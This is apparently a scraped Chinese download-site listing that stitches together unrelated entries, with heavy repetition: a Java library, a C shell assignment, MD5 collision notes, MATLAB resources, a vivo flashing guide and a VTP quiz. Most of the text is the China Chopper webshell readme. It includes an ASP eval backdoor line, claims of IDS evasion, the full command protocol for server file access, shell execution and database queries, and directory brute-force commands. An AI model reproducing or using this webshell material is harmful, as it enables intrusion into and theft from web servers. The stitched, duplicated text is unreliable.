符号推导Java中符号计算的库。
它允许符号精确推导。
它还提供了用于从前缀形式进行解析以及转换为中缀形式和等效Java代码的实用程序。
安装为了将符号派生添加到您的项目中,您可以通过Maven或直接使用jar包来执行。
使用Mavenpom.xml复制到pom.xml文件。
es.upm.etsisisym-derivation1.0.0作为jar包装如果您希望使用没有依赖项管理工具的库,则必须将sym-derivation的jar打包版本添加到项目的类路径中。
例如,如果您使用的是IntelliJIDEA,则将文件复制到项目目录,右
它允许符号精确推导。
它还提供了用于从前缀形式进行解析以及转换为中缀形式和等效Java代码的实用程序。
安装为了将符号派生添加到您的项目中,您可以通过Maven或直接使用jar包来执行。
使用Mavenpom.xml复制到pom.xml文件。
es.upm.etsisisym-derivation1.0.0作为jar包装如果您希望使用没有依赖项管理工具的库,则必须将sym-derivation的jar打包版本添加到项目的类路径中。
例如,如果您使用的是IntelliJIDEA,则将文件复制到项目目录,右
2024/10/28 13:29:35
28KB
1
1、应用UNIX的fork()等系统调用,编写一个c程序具有以下功能:a)实现Shell的基本功能,包括有:打印提示符;
接受和分析命令行(滤去无效的空格、tab符号以及换行符等);
执行命令(要有出错处理;
输入exit或者bye退出);
返回父进程;
b)处理后台程序(不需要wait)c)处理多行命令(分析命令行中的‘;’并处理之)<br>d)应用dup(),pipe()系统调用具有输入输出重定向以及管道功能;
收缩
接受和分析命令行(滤去无效的空格、tab符号以及换行符等);
执行命令(要有出错处理;
输入exit或者bye退出);
返回父进程;
b)处理后台程序(不需要wait)c)处理多行命令(分析命令行中的‘;’并处理之)<br>d)应用dup(),pipe()系统调用具有输入输出重定向以及管道功能;
收缩
2024/10/28 6:25:13
15KB
1
原来我总是很自信地以为:你有本事找到MD5的碰撞又如何?你难道还有本事让两个可执行文件的MD5一样,却又都能正常运行,并且可以做完全不同的事情么?答:还真的可以.http://www.win.tue.nl/hashclash/...World-colliding.exehttp://www.win.tue.nl/hashclash/...World-colliding.exe这两个程序会在屏幕上打印出不同的字符,但是它们的MD5都是一样的。
通读其论文后摘要如下:这几位密码学家使用的是“构造前缀碰撞法”(chosen-prefixcollisions)来进行此次攻击(是王小云所使用的攻击方法的改进版本)。
他们所使用的计算机是一台SonyPS3,且仅用了不到两天。
他们的结论:MD5算法不应再被用于任何软件完整性检查或代码签名的用途。
另:现在,如果仅仅是想要生成MD5相同而内容不同的文件的话,在任何主流配置的电脑上用几秒钟就可以完成了。
通读其论文后摘要如下:这几位密码学家使用的是“构造前缀碰撞法”(chosen-prefixcollisions)来进行此次攻击(是王小云所使用的攻击方法的改进版本)。
他们所使用的计算机是一台SonyPS3,且仅用了不到两天。
他们的结论:MD5算法不应再被用于任何软件完整性检查或代码签名的用途。
另:现在,如果仅仅是想要生成MD5相同而内容不同的文件的话,在任何主流配置的电脑上用几秒钟就可以完成了。
2024/10/27 16:07:35
26KB
1
《高等应用数学问题的MATLAB求解》一书的配书光盘。
供大家参考学习本光盘包括如下目录:“CAI教学材料”包含全套的PowerPoint文件,可以直接用于教学,具体请参见该目录中的readme.pps文件说明。
目前包含的为中文版辅助材料。
最新版本将在下面给出的“MATLAB大观园”网站不定期更新。
英文版教学辅助材料也将在该网站给出,适于双语教学。
“例题全部代码”包含本书全部例题的MATLAB语句。
文件命名方法为examp章号_例题号.m,例如书中例3-5对应的文件名为examp3_5.m。
为能使得本书例题方便执行,可以在MATLAB的命令窗口中由File/SetPath菜单将例题所在目录包含在内。
“开发函数和使用资源”包含作者为本书开发的全套函数;
一些可以用于符号运算的新函数放在了@sym子目录下;
rsda子目录下为“粗糙集数据处理工具箱”,该工具箱原作者为张雪峰,由薛定宇修改后定稿。
本书建议使用的其他免费工具箱均可以从给出的MATLAB大观园直接下载,其最新版本可以从下面的地址直接免费下载。
(1)bnb工具箱,书中第6章介绍的非线性整数规划程序。
下载地址:http://www.mathworks.com/matlabcentral/fileexchange/loadFile.do?objectId=95&objectType=file(2)gaot工具箱,用遗传算法求解最优化问题的工具箱。
为了避免和MATLAB7.0版本的新遗传算法与直接搜索工具箱在函数名上的冲突,这里将主函数名改为gaopt.m,相应的函数调用语句也作了适当的改动。
下载地址:http://www.ie.ncsu.edu/mirage/GAToolBox/gaot/http://www.mathworks.com/matlabcentral/fileexchange/loadFile.do?objectId=2797&objectType=file(3)lpsolve工具箱,整数线性规划的工具箱,由C语言通过mex格式调用,如果在您的MATLAB环境下不能正确使用该工具箱的dll文件,则说明MATLAB版本不兼容,需要您自己运行该目录的lp_mex.m文件重新生成dll文件。
下载地址:ftp://ftp.ics.ele.tue.nl/pub/lp_solve/http://www.netlib.org/ampl/solvers/lpsolve/(4)nit_new工具箱,是数值积分工具箱的修改版,原版适合于MATLAB4.X,为能在当前MATLAB版本下运行,对个别文件做了相关修正。
下载地址:http://www.matlab-world.com/progs/toolbox/nit.zip本书所涉及的TeXPoint2.0.3插件是由美国加州Berkeley大学开发的,包括3个文件,其最新版本可以到开发者的网站免费下载。
下载地址:http://raw.cs.berkeley.edu/texpoint/TeXPoint2.0.3插件所包括的3个文件也可以分别在如下地址下载:http://www.matlab-world.com/temp/TexPoint2000-2.0.3.msihttp://www.matlab-world.com/temp/TexPoint2002-2.0.3.msihttp://www.matlab-world.com/temp/TexPoint2003-2.0.3.msi相关网站地址列表:MATLAB大观园,作者维护的MATLAB教学与资源网站。
网站地址:http://www.matlab-world.comMATLAB语言与应用论坛,作者维护的论坛,讨论MATLAB方面的问题。
论坛地址:http://matlab.netsh.net
供大家参考学习本光盘包括如下目录:“CAI教学材料”包含全套的PowerPoint文件,可以直接用于教学,具体请参见该目录中的readme.pps文件说明。
目前包含的为中文版辅助材料。
最新版本将在下面给出的“MATLAB大观园”网站不定期更新。
英文版教学辅助材料也将在该网站给出,适于双语教学。
“例题全部代码”包含本书全部例题的MATLAB语句。
文件命名方法为examp章号_例题号.m,例如书中例3-5对应的文件名为examp3_5.m。
为能使得本书例题方便执行,可以在MATLAB的命令窗口中由File/SetPath菜单将例题所在目录包含在内。
“开发函数和使用资源”包含作者为本书开发的全套函数;
一些可以用于符号运算的新函数放在了@sym子目录下;
rsda子目录下为“粗糙集数据处理工具箱”,该工具箱原作者为张雪峰,由薛定宇修改后定稿。
本书建议使用的其他免费工具箱均可以从给出的MATLAB大观园直接下载,其最新版本可以从下面的地址直接免费下载。
(1)bnb工具箱,书中第6章介绍的非线性整数规划程序。
下载地址:http://www.mathworks.com/matlabcentral/fileexchange/loadFile.do?objectId=95&objectType=file(2)gaot工具箱,用遗传算法求解最优化问题的工具箱。
为了避免和MATLAB7.0版本的新遗传算法与直接搜索工具箱在函数名上的冲突,这里将主函数名改为gaopt.m,相应的函数调用语句也作了适当的改动。
下载地址:http://www.ie.ncsu.edu/mirage/GAToolBox/gaot/http://www.mathworks.com/matlabcentral/fileexchange/loadFile.do?objectId=2797&objectType=file(3)lpsolve工具箱,整数线性规划的工具箱,由C语言通过mex格式调用,如果在您的MATLAB环境下不能正确使用该工具箱的dll文件,则说明MATLAB版本不兼容,需要您自己运行该目录的lp_mex.m文件重新生成dll文件。
下载地址:ftp://ftp.ics.ele.tue.nl/pub/lp_solve/http://www.netlib.org/ampl/solvers/lpsolve/(4)nit_new工具箱,是数值积分工具箱的修改版,原版适合于MATLAB4.X,为能在当前MATLAB版本下运行,对个别文件做了相关修正。
下载地址:http://www.matlab-world.com/progs/toolbox/nit.zip本书所涉及的TeXPoint2.0.3插件是由美国加州Berkeley大学开发的,包括3个文件,其最新版本可以到开发者的网站免费下载。
下载地址:http://raw.cs.berkeley.edu/texpoint/TeXPoint2.0.3插件所包括的3个文件也可以分别在如下地址下载:http://www.matlab-world.com/temp/TexPoint2000-2.0.3.msihttp://www.matlab-world.com/temp/TexPoint2002-2.0.3.msihttp://www.matlab-world.com/temp/TexPoint2003-2.0.3.msi相关网站地址列表:MATLAB大观园,作者维护的MATLAB教学与资源网站。
网站地址:http://www.matlab-world.comMATLAB语言与应用论坛,作者维护的论坛,讨论MATLAB方面的问题。
论坛地址:http://matlab.netsh.net
2024/10/27 14:25:24
20.09MB
1
Tomasulo算法的模拟软件,可任意设置一系列指令(当然,按软件自动给出的6条指令也可以),然后,按步进方式运行。
每运行一步,均对保留站的状态变化进行解释(如果状态无变化,即只有时钟改变时,可不予解释),直至运行结束。
解释的内容包括:*指明哪条指令从一种状态变到另一种状态。
状态包括:流出(我们称为发射)、执行、写结果。
*对于指令的状态变化,保留站(当然也可以包括寄存器、load部件)发生了哪些变化。
每运行一步,均对保留站的状态变化进行解释(如果状态无变化,即只有时钟改变时,可不予解释),直至运行结束。
解释的内容包括:*指明哪条指令从一种状态变到另一种状态。
状态包括:流出(我们称为发射)、执行、写结果。
*对于指令的状态变化,保留站(当然也可以包括寄存器、load部件)发生了哪些变化。
2024/10/26 22:43:44
199KB
1
PA1100磁头解码芯片驱动代码,支持银行卡轨道1、2、3数据,支持正反向刷卡,执行结果分别打印出磁条卡的3个轨道数据
2024/10/26 4:31:39
4KB
1
杂草优化算法(IWO)是一种受杂草启发而提出的、基于种群的数值优化计算方法,其执行过程是模拟杂草入侵过程的算法。
在matlab环境中用m语言编程实现了IWO,并对其收敛性进行了仿真。
在matlab环境中用m语言编程实现了IWO,并对其收敛性进行了仿真。
2024/10/25 7:24:39
12KB
1
【vivo手机线刷工具详解】vivo手机线刷工具是一种专门针对vivo品牌智能手机的系统修复和升级软件,主要用于解决手机系统崩溃、无法启动、卡在logo等问题,也就是我们通常所说的“救砖”。
线刷工具能够通过USB数据线连接电脑,对手机进行底层系统级别的操作,包括安装新的系统固件、恢复出厂设置或者修复损坏的系统文件。
线刷过程一般分为几个关键步骤:1.**下载与准备**:你需要下载对应的vivo线刷工具,例如提供的AFTool_5.1.11版本。
这个工具包含了各种功能,可以对vivo手机进行刷机、解锁、升级等操作。
同时,确保你的手机有足够的电量,避免在刷机过程中因为电量不足导致中断。
2.**备份数据**:在进行线刷之前,强烈建议先备份手机中的重要数据,因为线刷可能会清除手机所有数据。
你可以使用vivo官方提供的云备份服务,或者将数据转移到外部存储设备。
3.**进入刷机模式**:不同的vivo手机进入刷机模式的方法可能不同,通常需要在关机状态下,按特定的键组合(如音量+电源键)进入Fastboot或Download模式。
4.**连接电脑**:使用USB数据线将手机连接到电脑,确保电脑已识别到手机,并安装了正确的驱动程序。
如果驱动未安装,工具可能无法识别手机,此时需要安装vivo官方的USB驱动。
5.**运行线刷工具**:打开下载好的AFTool_5.1.11,按照工具内的指引进行操作。
选择相应的功能,如“一键刷机”或“升级固件”。
6.**选择固件**:根据你的vivo手机型号,选择合适的固件文件。
固件通常以.zip格式提供,包含系统镜像和其他必要的文件。
7.**开始刷机**:点击开始按钮,工具会自动执行刷机过程。
在此期间不要断开USB连接,避免刷机失败。
8.**等待完成**:刷机过程可能需要几分钟到几十分钟不等,具体取决于固件大小和手机性能。
完成后,手机会自动重启,进入新的系统。
9.**检查与恢复**:刷机成功后,检查手机能否正常启动并运行。
之后,如果之前有备份,可以恢复数据。
需要注意的是,线刷虽然能够解决很多问题,但也存在风险,比如可能导致手机变砖或失去保修。
因此,除非必要,一般用户不推荐自行尝试。
在遇到问题时,优先考虑联系vivo官方客服或授权服务中心寻求帮助。
此外,线刷工具的使用务必谨慎,遵循官方指导,以免造成不必要的损失。
线刷工具能够通过USB数据线连接电脑,对手机进行底层系统级别的操作,包括安装新的系统固件、恢复出厂设置或者修复损坏的系统文件。
线刷过程一般分为几个关键步骤:1.**下载与准备**:你需要下载对应的vivo线刷工具,例如提供的AFTool_5.1.11版本。
这个工具包含了各种功能,可以对vivo手机进行刷机、解锁、升级等操作。
同时,确保你的手机有足够的电量,避免在刷机过程中因为电量不足导致中断。
2.**备份数据**:在进行线刷之前,强烈建议先备份手机中的重要数据,因为线刷可能会清除手机所有数据。
你可以使用vivo官方提供的云备份服务,或者将数据转移到外部存储设备。
3.**进入刷机模式**:不同的vivo手机进入刷机模式的方法可能不同,通常需要在关机状态下,按特定的键组合(如音量+电源键)进入Fastboot或Download模式。
4.**连接电脑**:使用USB数据线将手机连接到电脑,确保电脑已识别到手机,并安装了正确的驱动程序。
如果驱动未安装,工具可能无法识别手机,此时需要安装vivo官方的USB驱动。
5.**运行线刷工具**:打开下载好的AFTool_5.1.11,按照工具内的指引进行操作。
选择相应的功能,如“一键刷机”或“升级固件”。
6.**选择固件**:根据你的vivo手机型号,选择合适的固件文件。
固件通常以.zip格式提供,包含系统镜像和其他必要的文件。
7.**开始刷机**:点击开始按钮,工具会自动执行刷机过程。
在此期间不要断开USB连接,避免刷机失败。
8.**等待完成**:刷机过程可能需要几分钟到几十分钟不等,具体取决于固件大小和手机性能。
完成后,手机会自动重启,进入新的系统。
9.**检查与恢复**:刷机成功后,检查手机能否正常启动并运行。
之后,如果之前有备份,可以恢复数据。
需要注意的是,线刷虽然能够解决很多问题,但也存在风险,比如可能导致手机变砖或失去保修。
因此,除非必要,一般用户不推荐自行尝试。
在遇到问题时,优先考虑联系vivo官方客服或授权服务中心寻求帮助。
此外,线刷工具的使用务必谨慎,遵循官方指导,以免造成不必要的损失。
2024/10/24 4:09:20
129.56MB
1
2一台新交换机将加入远程办公室的现有网络。
网络管理员希望远程办公室的技术人员无法将新VLAN添加到该交换机,但又希望交换机接收来自VTP域的VLAN更新。
要满足这些条件,必须在新交换机上执行哪两个VTP配置步骤?(选择两项。
)在新交换机上配置IP地址。
在新交换机上配置现有VTP域名。
将两台交换机的所有端口都配置为接入模式。
将新交换机配置为VTP客户端。
启用VTP修剪。
网络管理员希望远程办公室的技术人员无法将新VLAN添加到该交换机,但又希望交换机接收来自VTP域的VLAN更新。
要满足这些条件,必须在新交换机上执行哪两个VTP配置步骤?(选择两项。
)在新交换机上配置IP地址。
在新交换机上配置现有VTP域名。
将两台交换机的所有端口都配置为接入模式。
将新交换机配置为VTP客户端。
启用VTP修剪。
2024/10/23 19:11:41
3.45MB
1
产品名称:中国菜刀(Chinachopper)生产厂家:中国菜刀贸易有限公司厂家地址:http://www.maicaidao.com/----------------------------------------------------------------------------------------------------------免责申明: 请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任!----------------------------------------------------------------------------------------------------------友情提示:程序在使用过程中难免有各种BUG,到官网看一下是否有更新吧,说不定己经修补了呢。
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分 1)要了解的 服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下: PHP: ASP: ASP.NET: (注意:ASP.NET要单独一个文件或此文件也是Jscript语言) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
2)怎么用 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理三大块功能,同时支持自定义的脚本执行,并可以导入导出数据。
要是其它都没错误,那么可能就是你把语言编码选错了。
1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法) 3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以及支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 注意:由于服务器的安全设置,某些功能可能不能正常使用。
3)关于配置信息怎么填? A)数据库方面: PHP脚本: 类型类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址主机地址可为机器名或IP地址,如localhost 数据库用户连接数据库的用户名,如root 数据库密码连接数据库的密码,如123455 ASP和ASP.NET脚本: 类型类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。
如MSSQL的配置信息为 Driver={SqlServer};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize脚本: 类型类型只能填XDB 与Customize脚本约定的配置信息 菜刀自带的server.jsp数据库参数填写方法如下(两行): MSSQL:com.microsoft.sqlserver.jdbc.SQLServerDriverjdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL:com.mysql.jdbc.Driverjdbc:mysql://localhost/test?user=root&password=123456 ORACLE:oracle.jdbc.driver.OracleDriverjdbc:oracle:thin:user/password@127.0.0.1:1521/test B)其它方面: 添加额外附加提交的数据,如ASP的新服务端是这样的: 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
https://target.com/cgi-bin/login.cgi uid=user1&pwd=123456 3)关于HTTP登录验证 SHELL地址这样填http://user:pass@server/server.asp 用户名密码中的特殊字符可用URL编码转换。
二、安全扫描 蜘蛛爬行,绑定域名查询,目录爆破。
命令解释: A)查单一IP的绑定域名 {reverse_ip}{url:http://www.test.com/} B)扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c}{url:http://www.test.com/} C)只扫描本C段开放的WEB服务器 {reverse_ip_c}{url:http://www.test.com/}{port} D)蜘蛛爬行 {spider}{url:http://www.test.com/} E)蜘蛛爬行,并设定爬行范围 {spider}{url:http://www.test.com/}{range:test.com} F)蜘蛛爬行,过滤重复URL加快速度 加上{filter} G)爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack}{url:http://%s/admin/}{flag:HTTP/1.1200}{dict:list.txt} {crack}{url:http://%s/admin/}{flag:!!HTTP/1.1404}{dict:list.txt} {crack}{url:http://www.test.com/%s/}{flag:successfully}{dict:list.txt}三、定时提醒 当闹钟来用吧,周期:每月/每周/每日/只一次。
四、快速启动 一些常用的快捷方式放在这里,可以指定用户身份运行程序。
这部分数据是加密存储的。
五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
六、其它部分 等待加入。
文件说明:------------------------------------------------------------------chopper.exe 菜刀程序db.mdb 菜刀的主数据库------------------------------------------------------------------cache.tmp 菜刀的缓存数据库(可删除)readme.txt 你现在正在看的(可删除)[目录]Script 存放菜刀的自写脚本和Customize模式Jsp的一个服务端文件(可删除)----附---------------------------Customize模式菜刀和服务端通信接口---------------------------------------------------------------------------------------------------其它语言的服务端代码可按此接口来编写(请参照server.jsp/server.cfm)---------------------例:菜刀客户端填写的密码为pass,网页编码选的是GB2312注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记注:返回的错误信息开头包含ERROR://注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
--------------------------------------------------------------------------------------------------------------------------------------------------------[得到当前目录的绝对路径]提交:pass=A&z0=GB2312返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表示例:c:\inetpub\wwwroot\ C:D:E:K:示例:/var/www/html/ [目录浏览]提交:pass=B&z0=GB2312&z1=目录绝对路径返回:先目录后文件,目录名后要加/,文件名后不要加/示例: 目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n 文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n[读取文本文件]提交:pass=C&z0=GB2312&z1=文件绝对路径返回:文本文件的内容[写入文本文件]提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容返回:成功返回1,不成功返回错误信息[删除文件或目录]提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径返回:成功返回1,不成功返回错误信息[下载文件]提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径返回:要下载文件的内容[上传文件]提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)返回:要下载文件的内容[复制文件或目录后粘贴]提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径返回:成功返回1,不成功返回错误信息[文件或目录重命名]提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)返回:成功返回1,不成功返回错误信息[新建目录]提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)返回:成功返回1,不成功返回错误信息[修改文件或目录时间]提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-ddHH:mm:ss)返回:成功返回1,不成功返回错误信息[下载文件到服务器]提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径返回:成功返回1,不成功返回错误信息[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令返回:命令执行结果[得到数据库基本信息]提交:pass=N&z0=GB2312&z1=数据库配置信息返回:成功返回数据库(以制表符\t分隔),不成功返回错误信息[获取数据库表名]提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名返回:成功返回数据表(以\t分隔),不成功返回错误信息[获取数据表列名]提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名返回:成功返回数据列(以制表符\t分隔),不成功返回错误信息[执行数据库命令]提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令返回:成功返回数据表内容,不成功返回错误信息注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。
行中的每列后加上\t|\t标记,每行以标记\r\n为结束
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分 1)要了解的 服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下: PHP: ASP: ASP.NET: (注意:ASP.NET要单独一个文件或此文件也是Jscript语言) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
2)怎么用 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理三大块功能,同时支持自定义的脚本执行,并可以导入导出数据。
要是其它都没错误,那么可能就是你把语言编码选错了。
1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法) 3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以及支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 注意:由于服务器的安全设置,某些功能可能不能正常使用。
3)关于配置信息怎么填? A)数据库方面: PHP脚本: 类型类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址主机地址可为机器名或IP地址,如localhost 数据库用户连接数据库的用户名,如root 数据库密码连接数据库的密码,如123455 ASP和ASP.NET脚本: 类型类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。
如MSSQL的配置信息为 Driver={SqlServer};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize脚本: 类型类型只能填XDB 与Customize脚本约定的配置信息 菜刀自带的server.jsp数据库参数填写方法如下(两行): MSSQL:com.microsoft.sqlserver.jdbc.SQLServerDriverjdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL:com.mysql.jdbc.Driverjdbc:mysql://localhost/test?user=root&password=123456 ORACLE:oracle.jdbc.driver.OracleDriverjdbc:oracle:thin:user/password@127.0.0.1:1521/test B)其它方面: 添加额外附加提交的数据,如ASP的新服务端是这样的: 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
https://target.com/cgi-bin/login.cgi uid=user1&pwd=123456 3)关于HTTP登录验证 SHELL地址这样填http://user:pass@server/server.asp 用户名密码中的特殊字符可用URL编码转换。
二、安全扫描 蜘蛛爬行,绑定域名查询,目录爆破。
命令解释: A)查单一IP的绑定域名 {reverse_ip}{url:http://www.test.com/} B)扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c}{url:http://www.test.com/} C)只扫描本C段开放的WEB服务器 {reverse_ip_c}{url:http://www.test.com/}{port} D)蜘蛛爬行 {spider}{url:http://www.test.com/} E)蜘蛛爬行,并设定爬行范围 {spider}{url:http://www.test.com/}{range:test.com} F)蜘蛛爬行,过滤重复URL加快速度 加上{filter} G)爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack}{url:http://%s/admin/}{flag:HTTP/1.1200}{dict:list.txt} {crack}{url:http://%s/admin/}{flag:!!HTTP/1.1404}{dict:list.txt} {crack}{url:http://www.test.com/%s/}{flag:successfully}{dict:list.txt}三、定时提醒 当闹钟来用吧,周期:每月/每周/每日/只一次。
四、快速启动 一些常用的快捷方式放在这里,可以指定用户身份运行程序。
这部分数据是加密存储的。
五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
六、其它部分 等待加入。
文件说明:------------------------------------------------------------------chopper.exe 菜刀程序db.mdb 菜刀的主数据库------------------------------------------------------------------cache.tmp 菜刀的缓存数据库(可删除)readme.txt 你现在正在看的(可删除)[目录]Script 存放菜刀的自写脚本和Customize模式Jsp的一个服务端文件(可删除)----附---------------------------Customize模式菜刀和服务端通信接口---------------------------------------------------------------------------------------------------其它语言的服务端代码可按此接口来编写(请参照server.jsp/server.cfm)---------------------例:菜刀客户端填写的密码为pass,网页编码选的是GB2312注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记注:返回的错误信息开头包含ERROR://注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
--------------------------------------------------------------------------------------------------------------------------------------------------------[得到当前目录的绝对路径]提交:pass=A&z0=GB2312返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表示例:c:\inetpub\wwwroot\ C:D:E:K:示例:/var/www/html/ [目录浏览]提交:pass=B&z0=GB2312&z1=目录绝对路径返回:先目录后文件,目录名后要加/,文件名后不要加/示例: 目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n 文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n[读取文本文件]提交:pass=C&z0=GB2312&z1=文件绝对路径返回:文本文件的内容[写入文本文件]提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容返回:成功返回1,不成功返回错误信息[删除文件或目录]提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径返回:成功返回1,不成功返回错误信息[下载文件]提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径返回:要下载文件的内容[上传文件]提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)返回:要下载文件的内容[复制文件或目录后粘贴]提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径返回:成功返回1,不成功返回错误信息[文件或目录重命名]提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)返回:成功返回1,不成功返回错误信息[新建目录]提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)返回:成功返回1,不成功返回错误信息[修改文件或目录时间]提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-ddHH:mm:ss)返回:成功返回1,不成功返回错误信息[下载文件到服务器]提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径返回:成功返回1,不成功返回错误信息[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令返回:命令执行结果[得到数据库基本信息]提交:pass=N&z0=GB2312&z1=数据库配置信息返回:成功返回数据库(以制表符\t分隔),不成功返回错误信息[获取数据库表名]提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名返回:成功返回数据表(以\t分隔),不成功返回错误信息[获取数据表列名]提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名返回:成功返回数据列(以制表符\t分隔),不成功返回错误信息[执行数据库命令]提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令返回:成功返回数据表内容,不成功返回错误信息注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。
行中的每列后加上\t|\t标记,每行以标记\r\n为结束
2024/10/23 12:54:30
197KB
1
在日常工作中,钉钉打卡成了我生活中不可或缺的一部分。然而,有时候这个看似简单的任务却给我带来了不少烦恼。
每天早晚,我总是得牢记打开钉钉应用,点击"工作台",再找到"考勤打卡"进行签到。有时候因为工作忙碌,会忘记打卡,导致考勤异常,影响当月的工作评价。而且,由于我使用的是苹果手机,有时候系统更新后,钉钉的某些功能会出现异常,使得打卡变得更加麻烦。
另外,我的家人使用的是安卓手机,他们也经常抱怨钉钉打卡的繁琐。尤其是对于那些不太熟悉手机操作的长辈来说,每次打卡都是一次挑战。他们总是担心自己会操作失误,导致打卡失败。
